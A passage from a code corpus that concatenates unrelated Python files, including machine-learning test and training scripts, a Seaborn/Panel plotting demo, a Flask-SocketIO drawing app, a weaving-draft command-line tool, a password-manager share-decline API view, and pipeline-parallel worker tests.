x, seq_length, target_mask, y = \
tf.py_func(get_batch, [], [tf.int64, tf.int64, tf.int64, tf.int64])
x = tf.reshape(
tf.one_hot(x, depth=10),
shape=(params.batch_size, params.max_difficulty,
params.num_digits * 10))
y = tf.reshape(
tf.one_hot(y, depth=10),
shape=(params.batch_size, params.max_difficulty, params.num_classes))
seq_length.set_shape(shape=(params.batch_size,))
target_mask.set_shape(
shape=(params.batch_size, params.max_difficulty, params.num_digits + 1))
return {
"inputs": x,
"seq_length": seq_length,
"difficulty": seq_length,
"target_mask": target_mask
}, y
return _input_fn
|
11483265
|
import matplotlib.pyplot as plt
import panel as pn
import seaborn as sns
penguins = sns.load_dataset("penguins")
from dataviz_in_python import config
config.configure(url="lib_seaborn", title="Seaborn")
TEXT = """
# Seaborn: Statistical data visualization
[Seaborn](https://seaborn.pydata.org/) is a Python data visualization
library based on [matplotlib](lib_matplotlib). It provides a high-level
interface for drawing attractive and informative statistical graphics.
Please note that the lead developer has announced upcoming, major changes
to the API.
[Source Code](https://github.com/MarcSkovMadsen/dataviz-in-python/blob/main/src/dataviz_in_python/presentation/lib_seaborn.py)
"""
pn.panel(TEXT, css_classes=[config.TEXT_CLASS]).servable()
def get_plot(theme="default", accent_base_color="blue"):
if theme == "dark":
sns.set_style("darkgrid")
plt.style.use("dark_background")
else:
plt.style.use("default")
sns.set_style("whitegrid")
plot = sns.displot(penguins, x="flipper_length_mm", color=accent_base_color)
fig0 = plot.fig
fig0.set_size_inches(16, 8)
return fig0
plot = get_plot(theme=config.get_theme(), accent_base_color=config.ACCENT_BASE_COLOR)
pn.pane.Matplotlib(plot, height=700, sizing_mode="stretch_both").servable()
|
11483303
|
from flask import Flask, jsonify, render_template
from subprocess import call
from flask_socketio import SocketIO, send, emit
app = Flask(__name__)
app.secret_key = 'mysecret'
socket_io = SocketIO(app)
# _mode = 'start' or 'stop'
_mode = 'stop'
@app.route('/')
def draw():
return render_template('main.html')
# Changing Mode
@socket_io.on('change mode')
def changer(data):
global _mode
if data['mode'] == 'start':
_mode = 'start'
else:
_mode = 'stop'
# Receiving Messages
@socket_io.on('my event')
def drawer(data):
global _mode
if _mode == 'stop':
pass
else:
print('input data: ' + str(data))
# send to webpage
emit('draw', data, broadcast=True)
if __name__ == '__main__':
socket_io.run(app, debug=True, host='localhost', port=8000)
#socket_io.run(app, debug=True, host='0.0.0.0', port=80)
|
11483351
|
from tests.fixtures.envs.wrappers.reshape_observation import ReshapeObservation
__all__ = ['ReshapeObservation']
|
11483467
|
import numpy as np
import h5py
import argparse
description="""
Merge partial LUT simulations into a single, complete
LUT with no NaN's.
"""
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=description)
parser.add_argument("h5_out", help="Output file")
parser.add_argument("h5_in", nargs="+", help="Input files")
args = parser.parse_args()
# read all partial simulations
beam_profiles = []
for h5_in in args.h5_in:
print "Processing %s..." % h5_in
with h5py.File(h5_in, "r") as f:
beam_profiles.append(f["beam_profile"].value)
ele_extent = f["ele_extent"].value
lat_extent = f["lat_extent"].value
rad_extent = f["rad_extent"].value
beam_profile = sum(beam_profiles)
min_value = np.min(beam_profile.flatten())
max_value = np.max(beam_profile.flatten())
beam_profile = (beam_profile-min_value)/(max_value-min_value)
with h5py.File(args.h5_out, "w") as f:
f["beam_profile"] = beam_profile
f["ele_extent"] = ele_extent
f["lat_extent"] = lat_extent
f["rad_extent"] = rad_extent
|
11483484
|
import unittest
import requests
from biolinkml.generators.yumlgen import YumlGenerator
from tests.utils.test_environment import TestEnvironmentTestCase
from tests.test_issues.environment import env
class EmptyClassTestCase(TestEnvironmentTestCase):
env = env
def test_prefix(self):
env.generate_single_file('issue112.yuml', lambda: YumlGenerator(env.input_path('issue_112.yaml')).serialize(),
value_is_returned=True)
with open(env.expected_path('issue112.yuml')) as f:
url = f.read()
resp = requests.get(url)
self.assertTrue(resp.ok)
if __name__ == '__main__':
unittest.main()
|
11483491
|
import string
from ml4ir.applications.ranking.tests.test_base import RankingTestBase
from ml4ir.base.features import preprocessing
import tensorflow as tf
import numpy as np
class RankingModelTest(RankingTestBase):
    def test_text_preprocessing(self):
"""
Asserts the preprocessing of a string tensor by
converting it to its lower case form and removing punctuations
"""
input_text = "ABCabc123!@#"
processed_text = (
preprocessing.preprocess_text(input_text, remove_punctuation=True, to_lower=True)
.numpy()
.decode("utf-8")
)
# Converting to lower case
assert processed_text.lower() == processed_text
# Removing punctuation
assert (
processed_text.translate(str.maketrans("", "", string.punctuation)) == processed_text
)
# Overall
assert processed_text.replace("\x00", "") == input_text.lower().translate(
str.maketrans("", "", string.punctuation)
)
assert processed_text.replace("\x00", "") == "abcabc123"
    def test_text_preprocessing_with_replace_by_whitespace(self):
"""
Asserts the preprocessing of a string tensor with custom punctuation character and whitespace replacement character
"""
input_text = " # abc. bcd-$#efg@hij ."
processed_text = (
preprocessing.preprocess_text(input_text,
remove_punctuation=True,
to_lower=True,
punctuation=".-$#",
replace_with_whitespace=True)
.numpy()
.decode("utf-8")
)
self.assertEqual("abc bcd efg@hij", processed_text)
def test_get_one_hot_vectorizer(self):
"""
Asserts ml4ir.base.features.preprocessing.get_one_hot_vectorizer
"""
feature_info = {
"name": "categorical_variable",
"feature_layer_info": {
"fn": "categorical_indicator_with_vocabulary_file",
"args": {
"vocabulary_file": "ml4ir/applications/classification/tests/data/configs/vocabulary/entity_id.csv",
"num_oov_buckets": 1,
},
},
"default_value": "",
}
one_hot_vectorizer = preprocessing.get_one_hot_label_vectorizer(feature_info, self.file_io)
# Assert 1st position
one_hot_labels = one_hot_vectorizer(tf.constant(["AAA"]))
expected_one_hot_labels = tf.constant([[1.] + 8*[0.]])
assert tf.reduce_all(tf.equal(one_hot_labels, expected_one_hot_labels))
# Assert 7th position
one_hot_labels = one_hot_vectorizer(tf.constant(["GGG"]))
expected_one_hot_labels = tf.constant([6*[0.] + [1.] + 2*[0.]])
assert tf.reduce_all(tf.equal(one_hot_labels, expected_one_hot_labels))
# Assert last position for out of vocabulary
one_hot_labels = one_hot_vectorizer(tf.constant(["out of vocabulary"]))
expected_one_hot_labels = tf.constant([8*[0.] + [1.]])
assert tf.reduce_all(tf.equal(one_hot_labels, expected_one_hot_labels))
def test_split_and_pad_string(self):
"""
Asserts ml4ir.base.features.preprocessing.split_and_pad_string
"""
input_text = tf.constant(["_A_BC_ab_c1_23!@_#"])
split_text = preprocessing.split_and_pad_string(input_text, split_char="_", max_length=25)
expected_split_text = tf.constant(["", "A", "BC", "ab", "c1", "23!@", "#"] + [""]*18)
assert tf.reduce_all(tf.equal(split_text, expected_split_text))
    def test_click_conversion(self):
typ = 'int'
label_vector = np.ones(10, dtype=typ)
label_vector = tf.convert_to_tensor(label_vector)
clicks = preprocessing.convert_label_to_clicks(label_vector, typ)
comp = tf.equal(label_vector, clicks)
assert sum(tf.dtypes.cast(comp, 'int8')) == 10
typ = 'float'
label_vector = np.ones(10, dtype=typ)
label_vector[0] = 5
label_vector[-1] = 5
label_vector = tf.convert_to_tensor(label_vector)
clicks = preprocessing.convert_label_to_clicks(label_vector, typ)
assert clicks[0] == 1 and clicks[-1] == 1 and sum(clicks[1:-1]) == 0
typ = 'int'
label_vector = np.zeros(10, dtype=typ)
label_vector = tf.convert_to_tensor(label_vector)
        clicks = preprocessing.convert_label_to_clicks(label_vector, typ)
        comp = tf.equal(label_vector, clicks)
        assert sum(tf.dtypes.cast(comp, 'int8')) == 10
|
11483504
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import sys
import argparse
from . import Draft, instructions
from .wif import WIFReader, WIFWriter
from .render import ImageRenderer, SVGRenderer
def load_draft(infile):
if infile.endswith('.wif'):
return WIFReader(infile).read()
elif infile.endswith('.json'):
with open(infile) as f:
return Draft.from_json(f.read())
else:
raise ValueError(
"filename %r unrecognized: .wif and .json are supported" %
infile)
def render(opts):
draft = load_draft(opts.infile)
if opts.outfile:
if opts.outfile.endswith('.svg'):
SVGRenderer(draft).save(opts.outfile)
else:
ImageRenderer(draft).save(opts.outfile)
else:
ImageRenderer(draft).show()
def convert(opts):
draft = load_draft(opts.infile)
if opts.outfile.endswith('.wif'):
WIFWriter(draft).write(opts.outfile)
elif opts.outfile.endswith('.json'):
with open(opts.outfile, 'w') as f:
f.write(draft.to_json())
def thread(opts):
draft = load_draft(opts.infile)
instructions.threading(draft, opts.repeats)
def weave(opts):
draft = load_draft(opts.infile)
assert opts.liftplan, "only liftplan supported for now"
save_filename = '.' + opts.infile + '.save'
print("SAVE FILENAME is %r" % save_filename)
instructions.weaving(draft,
repeats=opts.repeats,
start_repeat=opts.start_repeat,
start_pick=opts.start_pick,
save_filename=save_filename)
def tieup(opts):
draft = load_draft(opts.infile)
instructions.tieup(draft)
def stats(opts):
draft = load_draft(opts.infile)
warp_longest, weft_longest = draft.compute_longest_floats()
print("Title:", draft.title)
print("Author:", draft.author)
print("Address:", draft.address)
print("Email:", draft.email)
print("Telephone:", draft.telephone)
print("Fax:", draft.fax)
print("Notes:", draft.notes)
print("Date:", draft.date)
print("***")
print("Warp Threads:", len(draft.warp))
print("Weft Threads:", len(draft.weft))
print("Shafts:", len(draft.shafts))
print("Treadles:", len(draft.treadles))
print("Longest Float (Warp):", warp_longest)
print("Longest Float (Weft):", weft_longest)
def main(argv=sys.argv):
p = argparse.ArgumentParser(description='Weaving utilities.')
subparsers = p.add_subparsers(help='sub-command help')
p_render = subparsers.add_parser(
'render', help='Render a draft.')
p_render.add_argument('infile')
p_render.add_argument('outfile', nargs='?')
p_render.add_argument('--liftplan', action='store_true')
p_render.set_defaults(function=render)
p_convert = subparsers.add_parser(
'convert',
help='Convert between draft file types.')
p_convert.add_argument('infile')
p_convert.add_argument('outfile')
p_convert.add_argument('--liftplan', action='store_true')
p_convert.set_defaults(function=convert)
p_thread = subparsers.add_parser(
'thread',
help='Show threading instructions for a draft.')
p_thread.add_argument('infile')
p_thread.add_argument('--repeats', type=int, default=1)
p_thread.set_defaults(function=thread)
p_weave = subparsers.add_parser(
'weave',
help='Show weaving instructions for a draft.')
p_weave.add_argument('infile')
p_weave.add_argument('--liftplan', action='store_true')
p_weave.add_argument('--repeats', type=int, default=1)
p_weave.add_argument('--start-repeat', type=int, default=1)
p_weave.add_argument('--start-pick', type=int, default=1)
p_weave.set_defaults(function=weave)
p_tieup = subparsers.add_parser(
'tieup',
help='Show tie-up instructions for a draft.')
    p_tieup.add_argument('infile')
    p_tieup.set_defaults(function=tieup)
p_stats = subparsers.add_parser(
'stats',
help='Print stats for a draft.')
p_stats.add_argument('infile')
p_stats.set_defaults(function=stats)
opts, args = p.parse_known_args(argv[1:])
return opts.function(opts)
|
11483524
|
import pytest
from pyecore.ecore import *
def test_intro():
A = EClass('A') # We create metaclass named 'A'
A.eStructuralFeatures.append(EAttribute('myname', EString,
default_value='new_name'))
a1 = A() # We create an instance
assert a1.myname == 'new_name'
a1.myname = 'a_instance'
assert a1.myname == 'a_instance'
assert isinstance(a1, EObject)
assert a1.eClass is A
assert a1.eClass.eClass is EClass.eClass
assert a1.eClass.eClass is a1.eClass.eClass.eClass
assert a1.eClass.eStructuralFeatures
assert a1.eClass.eStructuralFeatures[0].name == 'myname'
assert a1.eClass.eStructuralFeatures[0].eClass is EAttribute.eClass
assert a1.__getattribute__('myname') == 'a_instance'
a1.__setattr__('myname', 'reflexive')
assert a1.__getattribute__('myname') == 'reflexive'
a1.eSet('myname', 'newname')
assert a1.eGet('myname') == 'newname'
with pytest.raises(BadValueError):
a1.myname = 1
def test_instance_abstract_intro():
MyMetaclass = EClass('MyMetaclass')
instance1 = MyMetaclass()
instance2 = MyMetaclass()
assert instance1 is not instance2
assert instance1.eClass.eAttributes == []
MyMetaclass.eStructuralFeatures.append(EAttribute('name', EString))
assert instance1.eClass.eAttributes != []
assert instance1.name is None
instance1.name = 'mystuff'
assert instance1.name == 'mystuff'
instance3 = MyMetaclass(name='myname')
assert instance3.name == 'myname'
|
11483537
|
import numpy as np
import pytest
from qcodes.utils.validators import PermissiveInts
def test_close_to_ints():
validator = PermissiveInts()
validator.validate(validator.valid_values[0])
a = 0
b = 10
values = np.linspace(a, b, b - a + 1)
for i in values:
validator.validate(i)
def test_bad_values():
validator = PermissiveInts(0, 10)
validator.validate(validator.valid_values[0])
a = 0
b = 10
values = np.linspace(a, b, b - a + 2)
for j, i in enumerate(values):
if j == 0 or j == 11:
validator.validate(i)
else:
with pytest.raises(TypeError):
validator.validate(i)
def test_valid_values():
val = PermissiveInts()
for vval in val.valid_values:
val.validate(vval)
|
11483567
|
from persona import *
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--data_folder', type=str, default='data/testing',
help='the folder that contains your dataset and vocabulary file')
parser.add_argument('--train_file', type=str, default='train.txt')
parser.add_argument('--dev_file', type=str, default='valid.txt')
parser.add_argument('--dictPath', type=str, default='vocabulary')
parser.add_argument('--save_folder', type=str, default='save/testing')
parser.add_argument('--save_prefix', type=str, default='model')
parser.add_argument('--save_params', type=str, default='params')
parser.add_argument('--output_file', type=str, default='log')
parser.add_argument('--no_save', action='store_true')
parser.add_argument('--cpu', action='store_true')
parser.add_argument('--UNK', type=int, default=0,
    help='the index of UNK. UNK+special_word=3.')
parser.add_argument('--special_word', type=int, default=3,
help='default special words include: padding, EOS, EOT.')
parser.add_argument('--fine_tuning', action='store_true')
parser.add_argument('--fine_tunine_model', type=str, default='model')
parser.add_argument('--PersonaNum', type=int, default=2)
parser.add_argument('--SpeakerMode', action='store_true')
parser.add_argument('--AddresseeMode', action='store_true')
parser.add_argument("--batch_size", type=int, default=256)
parser.add_argument("--source_max_length", type=int, default=50)
parser.add_argument("--target_max_length", type=int, default=50)
parser.add_argument("--max_iter", type=int, default=10)
parser.add_argument("--dimension", type=int, default=512)
parser.add_argument("--layers", type=int, default=4)
parser.add_argument("--init_weight", type=float, default=0.1)
parser.add_argument("--alpha", type=int, default=1)
parser.add_argument("--start_halve", type=int, default=6)
parser.add_argument("--thres", type=int, default=5)
parser.add_argument("--dropout", type=float, default=0.2)
args = parser.parse_args()
print(args)
print()
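# Hypothetical invocation sketch (script name and paths are placeholders, not from
# the source):
#   python <this_script>.py --data_folder data/testing --SpeakerMode --batch_size 256
# --SpeakerMode / --AddresseeMode toggle persona conditioning; --fine_tuning
# presumably warm-starts training from the model named by --fine_tunine_model.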
if __name__ == '__main__':
model = persona(args)
model.train()
|
11483672
|
import json
import torch
import random
import numpy as np
from opts import *
from model.Model import Model
from pycocoevalcap.bleu.bleu import Bleu
from pycocoevalcap.rouge.rouge import Rouge
from pycocoevalcap.cider.cider import Cider
from pycocoevalcap.meteor.meteor import Meteor
from torch.utils.data import DataLoader
from utils.dataloader import VideoDataset
from model.transformer.Constants import *
from nltk.translate.bleu_score import corpus_bleu
from model.transformer.Translator import translate_batch
import sys
sys.path.append("utils/pycocoevalcap/")
def pos_emb_generation(visual_feats):
'''
Generate the position embedding input for Transformers.
'''
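    # Positions are 1-based; index 0 is presumably reserved for padding
    # (see model.transformer.Constants).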
seq = list(range(1, visual_feats.shape[1] + 1))
src_pos = torch.tensor([seq] * visual_feats.shape[0]).cuda()
return src_pos
def list_to_sentence(words):
    # Join tokens into a single space-separated string (keeps the leading space).
    sentence = ''
    for word in words:
        sentence += ' ' + word
    return sentence
def test(loader, model, opt, cap_vocab, cms_vocab):
bleu_scores = []
write_to_txt = []
gts = []
res = []
for batch_id, data in enumerate(loader):
fc_feats = data['fc_feats'].cuda()
cap_labels = data['cap_labels'].cuda()
video_ids = data['video_ids']
with torch.no_grad():
# Beam Search Starts From Here
try:
batch_hyp, cms_batch_hyp = translate_batch(model, fc_feats, opt)
            except Exception:
                # Skip batches where beam search fails.
                continue
# Stack all GTs captions
references = []
for video in video_ids:
video_caps = []
for cap in opt['captions'][video]:
for _ in cap['attribute']:
video_caps.append(cap['final_caption'][1:-1] + _[1][1:-1])
references.append(video_caps)
# Stack all Predicted Captions
hypotheses = []
for cms_predict, predict in zip(cms_batch_hyp, batch_hyp):
_ = []
if CAP_EOS in predict[0]:
sep_id = predict[0].index(CAP_EOS)
else:
sep_id = -1
for word in predict[0][1: sep_id]:
_.append(cap_vocab[str(word)])
if CAP_EOS in cms_predict[0]:
sep_id = cms_predict[0].index(CAP_EOS)
else:
sep_id = -1
for word in cms_predict[0][0: sep_id]:
_.append(cms_vocab[str(word)])
hypotheses.append(_)
# Print out the predicted sentences and GT
for random_id in range(5):
            if EOS in batch_hyp[random_id][0]:
                stop_idx = batch_hyp[random_id][0].index(EOS)
else:
stop_idx = -1
video_id = video_ids[random_id]
cap = list_to_sentence([cap_vocab[str(widx)] for widx in batch_hyp[random_id][0][1: stop_idx] if widx != 0])
cms = list_to_sentence([cms_vocab[str(widx)] for widx in cms_batch_hyp[random_id][0][: -1] if widx != 0])
cap_gt = list_to_sentence([cap_vocab[str(word.cpu().numpy())] for word in cap_labels[random_id, 1:] if word != 0][0:-1])
_ = str(video_id + ',' + cap + ',' + cms + ',' + cap_gt)
write_to_txt.append(_)
print('Generated Caption:', cap, ' ', 'Generated CMS:', cms)
print('GT Caption:', cap_gt)
print('\n')
print(batch_id, ' ', batch_id * opt['batch_size'], ' out of ', '3010')
    # Compute corpus-level BLEU-1 through BLEU-4 scores
bleu_1 = corpus_bleu(references, hypotheses, weights=[1, 0, 0, 0])
bleu_2 = corpus_bleu(references, hypotheses, weights=[0.5, 0.5, 0, 0])
bleu_3 = corpus_bleu(references, hypotheses, weights=[0.333, 0.333, 0.333, 0])
bleu_4 = corpus_bleu(references, hypotheses, weights=[0.25, 0.25, 0.25, 0.25])
bleu_scores.append([bleu_1, bleu_2, bleu_3, bleu_4])
print("Bleu scores 1-4:", np.mean(np.asarray(bleu_scores), 0))
def main(opt):
dataset = VideoDataset(opt, 'test')
dataloader = DataLoader(dataset, batch_size=opt['batch_size'], shuffle=False)
opt['cms_vocab_size'] = dataset.get_cms_vocab_size()
opt['cap_vocab_size'] = dataset.get_cap_vocab_size()
if opt['cms'] == 'int':
cms_text_length = opt['int_max_len']
elif opt['cms'] == 'eff':
cms_text_length = opt['eff_max_len']
else:
cms_text_length = opt['att_max_len']
model = Model(
dataset.get_cap_vocab_size(),
dataset.get_cms_vocab_size(),
cap_max_seq=opt['cap_max_len'],
cms_max_seq=cms_text_length,
tgt_emb_prj_weight_sharing=True,
vis_emb=opt['dim_vis_feat'],
rnn_layers=opt['rnn_layer'],
d_k=opt['dim_head'],
d_v=opt['dim_head'],
d_model=opt['dim_model'],
d_word_vec=opt['dim_word'],
d_inner=opt['dim_inner'],
n_layers=opt['num_layer'],
n_head=opt['num_head'],
dropout=opt['dropout'])
if len(opt['load_checkpoint']) != 0:
state_dict = torch.load(opt['load_checkpoint'])
model.load_state_dict(state_dict)
model = model.cuda()
model.eval()
test(dataloader, model, opt, dataset.get_cap_vocab(), dataset.get_cms_vocab())
if __name__ == '__main__':
opt = parse_opt()
opt = vars(opt)
opt['captions'] = json.load(open(opt['caption_json']))
opt['batch_size'] = 30
main(opt)
|
11483679
|
from scitools.std import *
def f1(t):
return t**2*exp(-t**2)
def f2(t):
return t**2*f1(t)
t = linspace(0, 3, 51)
y1 = f1(t)
y2 = f2(t)
plot(t, y1, 'r-', t, y2, 'bo',
legend=('t^2*exp(-t^2)', 't^4*exp(-t^2)'),
savefig='plot2j.png')
ax = gca() # get current Axis object
ax.setp(xlabel='t', ylabel='y',
axis=[0, 4, -0.1, 0.6],
title='Plotting two curves in the same plot')
show() # show the plot again after ax.setp actions
print(ax.dump())
fig = gcf()
print(fig.dump())
input('Press Return key to quit: ')
|
11483703
|
from jinja2 import Environment, PackageLoader
from sqlalchemy import PrimaryKeyConstraint, ForeignKeyConstraint, CheckConstraint, UniqueConstraint
import dbd
from dbd.utils.text_utils import strip_table_name
JINJA_GENERATOR_ENV = Environment(loader=PackageLoader(dbd.__name__, 'generator/generator_templates'))
JINJA_GENERATOR_ENV.globals.update(
len=len, str=str, type=type, isinstance=isinstance,
strip_table_name=strip_table_name,
PrimaryKeyConstraint=PrimaryKeyConstraint,
ForeignKeyConstraint=ForeignKeyConstraint,
CheckConstraint=CheckConstraint,
UniqueConstraint=UniqueConstraint
)
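# Exposing these helpers and SQLAlchemy constraint classes as Jinja globals lets the
# generator templates call them directly in template expressions.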
|
11483706
|
from rest_framework import status
from rest_framework.response import Response
from rest_framework.generics import GenericAPIView
from ..permissions import IsAuthenticated
from django.core.cache import cache
from django.conf import settings
from ..authentication import TokenAuthentication
from ..app_settings import (
ShareRightDeclineSerializer,
)
class ShareRightDeclineView(GenericAPIView):
authentication_classes = (TokenAuthentication, )
permission_classes = (IsAuthenticated,)
allowed_methods = ('POST', 'OPTIONS', 'HEAD')
def get(self, *args, **kwargs):
return Response({}, status=status.HTTP_405_METHOD_NOT_ALLOWED)
def put(self, *args, **kwargs):
return Response({}, status=status.HTTP_405_METHOD_NOT_ALLOWED)
def post(self, request, *args, **kwargs):
"""
        Mark a Share_right as declined. In addition, delete information that is no
        longer needed, such as the title and encryption key.
:param request:
:param args:
:param kwargs:
:return: 200 / 403
"""
serializer = ShareRightDeclineSerializer(data=request.data, context=self.get_serializer_context())
if not serializer.is_valid():
return Response(
serializer.errors, status=status.HTTP_400_BAD_REQUEST
)
user_share_right_obj = serializer.validated_data.get('user_share_right_obj')
user_share_right_obj.accepted = False
user_share_right_obj.title = ''
user_share_right_obj.title_nonce = ''
user_share_right_obj.type = ''
user_share_right_obj.type_nonce = ''
user_share_right_obj.key_type = ''
user_share_right_obj.key = ''
user_share_right_obj.key_nonce = ''
user_share_right_obj.save()
if settings.CACHE_ENABLE:
cache_key = 'psono_user_status_' + str(user_share_right_obj.user.id)
cache.delete(cache_key)
return Response(status=status.HTTP_200_OK)
def delete(self, *args, **kwargs):
return Response({}, status=status.HTTP_405_METHOD_NOT_ALLOWED)
|
11483724
|
import threading
import time
import pytest
import torch
from torchgpipe.microbatch import Batch
from torchgpipe.stream import CPUStream
from torchgpipe.worker import Task, spawn_workers
class fake_device:
"""A test double for :class:`torch.device`. Every fake device is different
with each other.
"""
type = 'fake'
index = None
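# fake_device instances never compare equal to one another, so the worker tests can
# exercise per-device queue allocation (see test_worker_per_device below), in contrast
# to equivalent torch.device objects, which end up sharing a queue.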
def test_join_running_workers():
count = 0
def counter():
nonlocal count
time.sleep(0.1)
count += 1
return Batch(())
with spawn_workers([fake_device() for _ in range(10)]) as (in_queues, out_queues):
def call_in_worker(i, f):
task = Task(CPUStream, compute=f, finalize=None)
in_queues[i].put(task)
for i in range(10):
call_in_worker(i, counter)
# There's no nondeterminism because 'spawn_workers' joins all running
# workers.
assert count == 10
def test_join_running_workers_with_exception():
class ExpectedException(Exception):
pass
count = 0
def counter():
nonlocal count
time.sleep(0.1)
count += 1
return Batch(())
with pytest.raises(ExpectedException):
with spawn_workers([fake_device() for _ in range(10)]) as (in_queues, out_queues):
def call_in_worker(i, f):
task = Task(CPUStream, compute=f, finalize=None)
in_queues[i].put(task)
for i in range(10):
call_in_worker(i, counter)
raise ExpectedException
# There's no nondeterminism because only 1 task can be placed in input
# queues.
assert count == 10
def test_compute_multithreading():
"""Task.compute should be executed on multiple threads."""
thread_ids = set()
def log_thread_id():
thread_id = threading.current_thread().ident
thread_ids.add(thread_id)
return Batch(())
with spawn_workers([fake_device() for _ in range(2)]) as (in_queues, out_queues):
for i in range(2):
t = Task(CPUStream, compute=log_thread_id, finalize=None)
in_queues[i].put(t)
for i in range(2):
out_queues[i].get()
assert len(thread_ids) == 2
def test_compute_success():
"""Task.compute returns (True, (task, batch)) on success."""
def _42():
return Batch(torch.tensor(42))
with spawn_workers([torch.device('cpu')]) as (in_queues, out_queues):
t = Task(CPUStream, compute=_42, finalize=None)
in_queues[0].put(t)
ok, (task, batch) = out_queues[0].get()
assert ok
assert task is t
assert isinstance(batch, Batch)
assert batch[0].item() == 42
def test_compute_exception():
"""Task.compute returns (False, exc_info) on failure."""
def zero_div():
0/0
with spawn_workers([torch.device('cpu')]) as (in_queues, out_queues):
t = Task(CPUStream, compute=zero_div, finalize=None)
in_queues[0].put(t)
ok, exc_info = out_queues[0].get()
assert not ok
assert isinstance(exc_info, tuple)
assert issubclass(exc_info[0], ZeroDivisionError)
@pytest.mark.parametrize('grad_mode', [True, False])
def test_grad_mode(grad_mode):
def detect_grad_enabled():
x = torch.rand(1, requires_grad=torch.is_grad_enabled())
return Batch(x)
with torch.set_grad_enabled(grad_mode):
with spawn_workers([torch.device('cpu')]) as (in_queues, out_queues):
task = Task(CPUStream, compute=detect_grad_enabled, finalize=None)
in_queues[0].put(task)
ok, (_, batch) = out_queues[0].get()
assert ok
assert batch[0].requires_grad == grad_mode
def test_worker_per_device():
cpu = torch.device('cpu')
cpu0 = torch.device('cpu', index=0)
fake1 = fake_device()
fake2 = fake_device()
with spawn_workers([cpu, cpu, cpu0, fake1, fake2]) as (in_queues, out_queues):
assert len(in_queues) == len(out_queues) == 5
# 0: cpu, 1: cpu, 2: cpu0
assert in_queues[0] is in_queues[1] is in_queues[2]
assert out_queues[0] is out_queues[1] is out_queues[2]
# 3: fake1, 4: fake2
assert in_queues[3] is not in_queues[4]
assert out_queues[3] is not out_queues[4]
|
11483749
|
import operator
import pytest
from ...primitives import Int, Str, Any
from ...containers import List
from ...geospatial import ImageCollection
from ...identifier import parameter
from .. import MaskedArray, Array, DType, Scalar
import numpy as np
from ...core import ProxyTypeError
arr_fixture = [[1, 2], [3, 4]]
mask_fixture = [[True, False], [False, True]]
ma = MaskedArray([[[1, 2, 3], [4, 5, 6], [7, 8, 9], [10, 11, 12]]], False)
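# Shared module-level fixture: a 1 x 4 x 3 MaskedArray (mask=False) reused by the
# property, indexing, and reduction tests below.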
def test_init():
ma = MaskedArray(arr_fixture, mask_fixture)
assert isinstance(ma, MaskedArray)
assert ma.params == ()
def test_init_bool_mask():
ma = MaskedArray(arr_fixture, False)
assert isinstance(ma, MaskedArray)
assert ma.params == ()
def test_init_fill_value():
fill_value = 5
ma = MaskedArray(arr_fixture, mask_fixture, fill_value=fill_value)
assert isinstance(ma, MaskedArray)
assert ma.params == ()
fill_value = Array([5, 6])
ma = MaskedArray(arr_fixture, mask_fixture, fill_value=fill_value)
def test_from_numpy():
np_ma = np.ma.masked_array([1, 2, 3], [True, True, False])
ma = MaskedArray.from_numpy(np_ma)
assert isinstance(ma, MaskedArray)
assert isinstance(ma, MaskedArray)
assert ma.params == ()
def test_init_params():
x = parameter("x", Int)
y = parameter("y", Int)
ma = MaskedArray(data=x, mask=mask_fixture, fill_value=y)
assert isinstance(ma, MaskedArray)
assert ma.params == (x, y)
@pytest.mark.parametrize(
"val",
[
[1, 2, 3],
np.array([1, 2, 3]),
np.ma.masked_array([1, 2, 3], [True, True, False]),
Any([1, 2]),
],
)
def test_promote(val):
ma = MaskedArray._promote(val)
assert isinstance(ma, MaskedArray)
@pytest.mark.parametrize(
"val", ["foo", Str("foo"), List[Int]([1, 2, 3]), np.array([1, 2], dtype=np.object)]
)
def test_promote_invalid(val):
with pytest.raises((TypeError, ProxyTypeError)):
MaskedArray._promote(val)
def test_dtype():
assert isinstance(ma.dtype, DType)
def test_ndim():
assert isinstance(ma.ndim, Int)
def test_shape():
assert isinstance(ma.shape, List[Int])
def test_size():
assert isinstance(ma.size, Int)
def test_astype():
assert isinstance(ma.astype("int"), MaskedArray)
assert isinstance(ma.astype(DType(int)), MaskedArray)
def test_flatten():
assert isinstance(ma.flatten(), MaskedArray)
@pytest.mark.parametrize("shape", [(-1,), (1, 2)])
def test_reshape(shape):
assert isinstance(ma.reshape(*shape), MaskedArray)
@pytest.mark.parametrize(
"idx",
[
None,
1,
slice(2),
(0, 0, 0),
(None, 0, 0, 0),
(1, None),
[1, 2],
Array([1, 2]),
Array([True, False]),
Array([[[]]]),
(Array([[[]]]), None),
(0, Array([[]])),
(0, Array([[]]), None),
],
)
def test_getitem(idx):
result = ma[idx]
assert isinstance(result, MaskedArray)
@pytest.mark.parametrize(
"idx, err_type, msg",
[
([1, 2.2], TypeError, r"Invalid types in \[1, 2.2\]"),
(
List[Str]([]),
TypeError,
r"only be sliced with 1D List\[Int\] or List\[Bool\], not List\[Str\]",
),
(
(Array([]), Array([])),
ValueError,
"cannot slice an Array with lists or Arrays in multiple axes",
),
(
([1], [2]),
ValueError,
"cannot slice an Array with lists or Arrays in multiple axes",
),
(
([1], Array([])),
ValueError,
"cannot slice an Array with lists or Arrays in multiple axes",
),
],
)
def test_getitem_error(idx, err_type, msg):
with pytest.raises(err_type, match=msg):
ma[idx]
def test_to_imagery():
assert isinstance(ma.to_imagery(), ImageCollection)
def test_to_imagery_error():
with pytest.raises(TypeError):
ma.to_imagery(properties="foo")
    with pytest.raises(TypeError):
        ma.to_imagery(bandinfo=[1, 2, 3])
@pytest.mark.parametrize(
"method",
[
operator.lt,
operator.le,
operator.gt,
operator.ge,
operator.eq,
operator.ne,
operator.add,
operator.sub,
operator.mul,
operator.floordiv,
operator.truediv,
operator.mod,
operator.pow,
],
)
@pytest.mark.parametrize("other", [Array([[1, 2, 3], [4, 5, 6]]), Array(1), 1, 0.5])
def test_container_methods(method, other):
result = method(ma, other)
r_result = method(other, ma)
assert isinstance(result, MaskedArray)
assert isinstance(r_result, MaskedArray)
@pytest.mark.parametrize(
"axis, return_type", [(1, MaskedArray), ((1, 2), MaskedArray), (None, Scalar)]
)
def test_stats(axis, return_type):
assert isinstance(ma.min(axis=axis), return_type)
assert isinstance(ma.max(axis=axis), return_type)
assert isinstance(ma.mean(axis=axis), return_type)
assert isinstance(ma.median(axis=axis), return_type)
assert isinstance(ma.sum(axis=axis), return_type)
assert isinstance(ma.std(axis=axis), return_type)
assert isinstance(ma.count(axis=axis), return_type)
def test_getdata():
arr = ma.getdata()
